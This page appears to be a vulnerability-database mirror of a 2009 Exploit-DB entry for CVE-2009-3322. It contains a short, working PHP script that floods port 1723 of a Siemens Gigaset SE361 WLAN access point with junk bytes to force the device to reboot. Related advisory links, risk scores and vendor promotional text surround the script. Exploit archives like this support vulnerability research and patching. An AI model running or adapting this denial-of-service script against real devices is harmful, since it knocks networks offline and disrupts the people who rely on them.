Lucene search
+L

Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)

🗓️ 11 Sep 2009 00:00:00Reported by crashbrzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 60 Views

Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service) on port 172

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-3322
11 Sep 200900:00
circl
Check Point Advisories
Siemens Gigaset SE361 WLAN Remote Reboot Exploit Denial of Service - Ver2 (CVE-2009-3322)
28 Dec 201400:00
checkpoint_advisories
CVE
CVE-2009-3322
23 Sep 200910:00
cve
Cvelist
CVE-2009-3322
23 Sep 200910:00
cvelist
NVD
CVE-2009-3322
23 Sep 200912:08
nvd
Prion
Design/Logic Flaw
23 Sep 200912:08
prion
Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.
It takes a few bytes for the AP to automatically restart

<?php
$apaddr = "192.168.2.1";
$apport="1723";


$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />\n";
} else {
    $trash = str_repeat("\x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash \r\n";
    }
    fclose($con);
}
?>

# milw0rm.com [2009-09-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.03481
60